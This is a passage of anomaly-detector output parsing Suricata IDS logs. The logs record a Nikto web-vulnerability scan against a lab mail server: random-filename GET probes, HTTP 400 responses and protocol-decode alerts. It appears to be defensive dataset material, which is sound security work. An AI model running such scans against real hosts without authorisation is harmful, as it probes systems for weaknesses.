"AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.map", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.377734+0000\",\"flow_id\":2176156833595140,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.377734, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2176156833595140,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.map\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.map\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.map", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.map", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46966, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2176156833595140,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2176156833595140, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.377734+0000\",\"flow_id\":2176156833595140,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.379849 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46968 -> 192.168.10.154:80", "/parser/model/time": 1583349514.379849, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46968, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.379849 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46968 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.Big5", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.380109+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.380109, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1414354189338696,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.Big5\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.Big5\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.Big5", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.Big5", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46968, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1414354189338696,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1414354189338696, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.380109+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.382662 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46970 -> 192.168.10.154:80", "/parser/model/time": 1583349514.382662, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46970, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.382662 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46970 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.10:100", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.382965+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.382965, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":268736087642508,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.10:100\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.10:100\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.10:100", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.10:100", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46970, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":268736087642508,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 268736087642508, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.382965+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.385406 [**] [1:2221030:1] SURICATA HTTP METHOD 